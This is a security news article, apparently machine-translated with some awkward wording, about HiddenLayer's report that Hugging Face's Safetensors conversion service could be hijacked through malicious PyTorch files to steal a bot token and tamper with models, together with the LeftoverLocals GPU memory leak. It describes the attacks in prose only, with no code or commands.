Cybersecurity researchers have discovered that the Hugging Face Safetensors conversion service can be compromised to hijack user-submitted templates and cause supply chain attacks.
“Malicious pull requests with attacker-controlled data from the Hugging Face service can be sent to any repository on the platform, as well as hijack any models submitted via the conversion service,” HiddenLayer said in a report published last week.
This, in turn, can be achieved using a hijacked template that must be converted by the service, thus allowing malicious actors to request changes to any repository on the platform by masquerading as a conversion bot.
Hugging Face is a popular collaboration platform that helps users host pre-trained machine learning models and datasets, as well as build, deploy, and train them.
Safetensors is a format the company designed to store tensors with security in mind, as opposed to pickles, which has likely been weaponized by threat actors to execute arbitrary code and deploy Cobalt Strike, Mythic, and Metasploit stagers.
It also comes with a conversion service that allows users to convert any PyTorch model (e.g. pickle) to its Safetensor equivalent via a pull request.
Analysis of this module by HiddenLayer found that it is hypothetically possible that an attacker could hijack the hosted conversion service using a malicious PyTorch binary and compromise the system hosting it.
Furthermore, the token associated with SFConvertbot, an official bot designed to generate the pull request, could be exfiltrated to send a malicious pull request to any site repository, leading to a scenario where a threat actor could tamper with the model and implant it. neural backdoors.
“An attacker could execute any arbitrary code whenever someone attempted to convert their model,” researchers Eoin Wickens and Kasimir Schulz noted. “Without any indication to the users themselves, their models could be hijacked upon conversion.”
If a user attempted to convert their private repository, the attack could pave the way for them to steal the Hugging Face token, otherwise access internal models and datasets, and even poison them.
To further complicate matters, an adversary could take advantage of the fact that any user can submit a conversion request to a public repository to hijack or alter a widely used model, potentially resulting in significant supply chain risk.
“Despite the best intentions to protect machine learning models in the Hugging Face ecosystem, the conversion service proved vulnerable and had the potential to cause a widespread supply chain attack via the official Hugging Face service,” they said researchers.
“An attacker could penetrate the container running the service and compromise any models converted by the service.”
The development comes just over a month after Trail of Bits disclosed LeftoverLocals (CVE-2023-4969, CVSS score: 6.5), a vulnerability that allows data recovery from general-purpose graphics processing units from Apple, Qualcomm, AMD and Imagination. GPGPU).
The memory leak flaw, which results from the failure to adequately isolate process memory, allows a local attacker to read memory from other processes, including another user’s interactive session with a Large Language Model (LLM) .
“This data leak can have serious security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights,” said security researchers Tyler Sorensen and Heidy Khlaaf .